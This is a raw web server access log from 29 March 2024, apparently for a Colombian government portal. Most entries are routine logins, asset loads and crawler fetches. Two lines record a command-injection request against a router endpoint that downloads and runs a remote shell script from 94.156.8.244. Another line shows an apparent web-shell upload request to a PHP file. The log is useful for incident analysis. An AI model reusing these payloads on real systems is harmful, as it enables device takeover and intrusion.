181.53.12.229 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.102.94.74 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
186.102.94.74 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.94.74 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.102.94.74 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.94.74 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.94.74 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.94.74 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.94.74 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.94.74 - - [29/Mar/2024:11:02:32 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
47.128.116.128 - - [29/Mar/2024:11:02:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=upload&d=E%3A%5Cnuevo%5Csendmail%5C HTTP/1.1" 200 2814
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16175
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:35 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:43 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:43 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
181.53.12.229 - - [29/Mar/2024:11:02:44 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 63983
181.53.12.229 - - [29/Mar/2024:11:02:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:02:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
181.53.12.229 - - [29/Mar/2024:11:02:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 4749
173.252.127.1 - - [29/Mar/2024:11:02:49 -0500] "GET /images/Rueda%20de%20prensa.jpeg HTTP/1.1" 200 58715
181.53.12.229 - - [29/Mar/2024:11:02:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32141
40.77.167.75 - - [29/Mar/2024:11:03:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0471.pdf HTTP/1.1" 200 396128
201.245.192.253 - - [29/Mar/2024:11:04:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
172.22.2.4 - - [29/Mar/2024:11:04:33 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [29/Mar/2024:11:04:33 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
216.245.221.92 - - [29/Mar/2024:11:04:44 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2024:11:04:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2024:11:05:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
52.167.144.211 - - [29/Mar/2024:11:07:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0835.pdf HTTP/1.1" 200 370462
146.19.24.28 - - [29/Mar/2024:11:08:06 -0500] "GET / HTTP/1.1" 200 319
181.53.12.229 - - [29/Mar/2024:11:08:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5484
181.53.12.229 - - [29/Mar/2024:11:08:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 145193
181.53.12.229 - - [29/Mar/2024:11:08:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:08:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:08:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:08:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:08:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:08:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:11:08:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
66.249.66.37 - - [29/Mar/2024:11:08:52 -0500] "GET /ofensiva-conta-el-trafico-de-fauna-silvestre-durante-la-semana-ambiental-en-bogota.html HTTP/1.1" 200 989
52.167.144.211 - - [29/Mar/2024:11:09:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5678.pdf HTTP/1.1" 200 958485
216.244.66.195 - - [29/Mar/2024:11:09:21 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [29/Mar/2024:11:09:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
216.245.221.92 - - [29/Mar/2024:11:09:44 -0500] "HEAD / HTTP/1.1" 200 -
179.60.242.67 - - [29/Mar/2024:11:09:56 -0500] "GET /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 302 -
179.60.242.67 - - [29/Mar/2024:11:09:56 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12411
179.60.242.67 - - [29/Mar/2024:11:09:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
179.60.242.67 - - [29/Mar/2024:11:09:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:56 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
179.60.242.67 - - [29/Mar/2024:11:09:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
179.60.242.67 - - [29/Mar/2024:11:09:57 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
179.60.242.67 - - [29/Mar/2024:11:09:57 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 15714
179.60.242.67 - - [29/Mar/2024:11:09:57 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 16070
179.60.242.67 - - [29/Mar/2024:11:09:57 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
179.60.242.67 - - [29/Mar/2024:11:09:57 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
179.60.242.67 - - [29/Mar/2024:11:09:57 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:57 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
179.60.242.67 - - [29/Mar/2024:11:09:57 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:09:58 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:10:01 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16164
179.60.242.67 - - [29/Mar/2024:11:10:01 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
179.60.242.67 - - [29/Mar/2024:11:10:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:10:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:10:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:10:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:10:02 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
179.60.242.67 - - [29/Mar/2024:11:10:02 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
179.60.242.67 - - [29/Mar/2024:11:10:02 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 29599
179.60.242.67 - - [29/Mar/2024:11:10:02 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 15714
179.60.242.67 - - [29/Mar/2024:11:10:02 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
186.29.81.44 - - [29/Mar/2024:11:10:20 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202022/3918.pdf HTTP/1.1" 200 -
186.29.81.44 - - [29/Mar/2024:11:10:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3918.pdf HTTP/1.1" 200 405563
40.77.167.46 - - [29/Mar/2024:11:10:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2802.pdf HTTP/1.1" 200 331474
40.77.167.46 - - [29/Mar/2024:11:10:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2117.pdf HTTP/1.1" 200 477568
40.77.167.46 - - [29/Mar/2024:11:10:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3219.pdf HTTP/1.1" 200 408801
40.77.167.46 - - [29/Mar/2024:11:10:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2351.pdf HTTP/1.1" 200 375058
40.77.167.46 - - [29/Mar/2024:11:10:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3399.pdf HTTP/1.1" 200 381022
40.77.167.46 - - [29/Mar/2024:11:10:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0790.pdf HTTP/1.1" 200 406300
40.77.167.46 - - [29/Mar/2024:11:10:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2347.pdf HTTP/1.1" 200 562381
40.77.167.46 - - [29/Mar/2024:11:10:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0009.pdf HTTP/1.1" 200 1168102
40.77.167.46 - - [29/Mar/2024:11:10:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0010.pdf HTTP/1.1" 200 1066692
179.60.242.67 - - [29/Mar/2024:11:10:55 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
179.60.242.67 - - [29/Mar/2024:11:10:55 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1473
40.77.167.46 - - [29/Mar/2024:11:10:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0083.pdf HTTP/1.1" 200 684497
40.77.167.46 - - [29/Mar/2024:11:10:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1727.pdf HTTP/1.1" 200 407090
40.77.167.46 - - [29/Mar/2024:11:10:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0843.pdf HTTP/1.1" 200 666894
40.77.167.46 - - [29/Mar/2024:11:10:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0267.pdf HTTP/1.1" 200 1637745
179.60.242.67 - - [29/Mar/2024:11:10:57 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
40.77.167.46 - - [29/Mar/2024:11:10:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2951.pdf HTTP/1.1" 200 437820
40.77.167.46 - - [29/Mar/2024:11:10:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0544.pdf HTTP/1.1" 200 535025
40.77.167.46 - - [29/Mar/2024:11:10:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1600.pdf HTTP/1.1" 200 599335
40.77.167.46 - - [29/Mar/2024:11:10:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0195.pdf HTTP/1.1" 200 714822
40.77.167.46 - - [29/Mar/2024:11:10:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0087.pdf HTTP/1.1" 200 397993
40.77.167.46 - - [29/Mar/2024:11:10:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1467.pdf HTTP/1.1" 200 895631
40.77.167.46 - - [29/Mar/2024:11:10:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1252.pdf HTTP/1.1" 200 388045
40.77.167.46 - - [29/Mar/2024:11:10:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2675.pdf HTTP/1.1" 200 411777
40.77.167.46 - - [29/Mar/2024:11:10:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0604.pdf HTTP/1.1" 200 514632
40.77.167.46 - - [29/Mar/2024:11:11:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1339.pdf HTTP/1.1" 200 406464
40.77.167.46 - - [29/Mar/2024:11:11:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3270.pdf HTTP/1.1" 200 391178
40.77.167.46 - - [29/Mar/2024:11:11:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3361.pdf HTTP/1.1" 200 1399097
40.77.167.46 - - [29/Mar/2024:11:11:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0826.pdf HTTP/1.1" 200 663579
40.77.167.46 - - [29/Mar/2024:11:11:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1364.pdf HTTP/1.1" 200 821320
40.77.167.46 - - [29/Mar/2024:11:11:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1381.pdf HTTP/1.1" 200 676130
40.77.167.46 - - [29/Mar/2024:11:11:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1446.pdf HTTP/1.1" 200 802174
40.77.167.46 - - [29/Mar/2024:11:11:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1393.pdf HTTP/1.1" 200 946225
179.60.242.67 - - [29/Mar/2024:11:10:59 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 34943
179.60.242.67 - - [29/Mar/2024:11:11:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
179.60.242.67 - - [29/Mar/2024:11:11:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 152163
179.60.242.67 - - [29/Mar/2024:11:11:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 19885
179.60.242.67 - - [29/Mar/2024:11:11:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:19 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:19 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:20 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
52.167.144.21 - - [29/Mar/2024:11:11:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1326.pdf HTTP/1.1" 200 553106
52.167.144.21 - - [29/Mar/2024:11:11:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3223.pdf HTTP/1.1" 200 416082
52.167.144.21 - - [29/Mar/2024:11:11:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0446.pdf HTTP/1.1" 200 696401
52.167.144.21 - - [29/Mar/2024:11:11:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2709.pdf HTTP/1.1" 200 421368
52.167.144.21 - - [29/Mar/2024:11:11:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2114.pdf HTTP/1.1" 200 696394
52.167.144.21 - - [29/Mar/2024:11:11:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1944.pdf HTTP/1.1" 200 716996
52.167.144.21 - - [29/Mar/2024:11:11:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1825.pdf HTTP/1.1" 200 648871
52.167.144.21 - - [29/Mar/2024:11:11:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2436.pdf HTTP/1.1" 200 364263
52.167.144.21 - - [29/Mar/2024:11:11:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3365.pdf HTTP/1.1" 200 403789
52.167.144.21 - - [29/Mar/2024:11:11:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3231.pdf HTTP/1.1" 200 399450
52.167.144.21 - - [29/Mar/2024:11:11:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1856.pdf HTTP/1.1" 200 589362
52.167.144.21 - - [29/Mar/2024:11:11:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3271.pdf HTTP/1.1" 200 364259
52.167.144.21 - - [29/Mar/2024:11:11:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1745.pdf HTTP/1.1" 200 420998
52.167.144.21 - - [29/Mar/2024:11:11:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3363.pdf HTTP/1.1" 200 363182
52.167.144.21 - - [29/Mar/2024:11:11:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1758.pdf HTTP/1.1" 200 488259
52.167.144.21 - - [29/Mar/2024:11:11:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3533.pdf HTTP/1.1" 200 401562
52.167.144.21 - - [29/Mar/2024:11:11:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0468.pdf HTTP/1.1" 200 372382
52.167.144.21 - - [29/Mar/2024:11:11:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1934.pdf HTTP/1.1" 200 589998
52.167.144.21 - - [29/Mar/2024:11:11:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1651.pdf HTTP/1.1" 200 745938
52.167.144.21 - - [29/Mar/2024:11:11:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2116.pdf HTTP/1.1" 200 401032
52.167.144.21 - - [29/Mar/2024:11:11:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3272.pdf HTTP/1.1" 200 347395
52.167.144.21 - - [29/Mar/2024:11:11:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2024.pdf HTTP/1.1" 200 626439
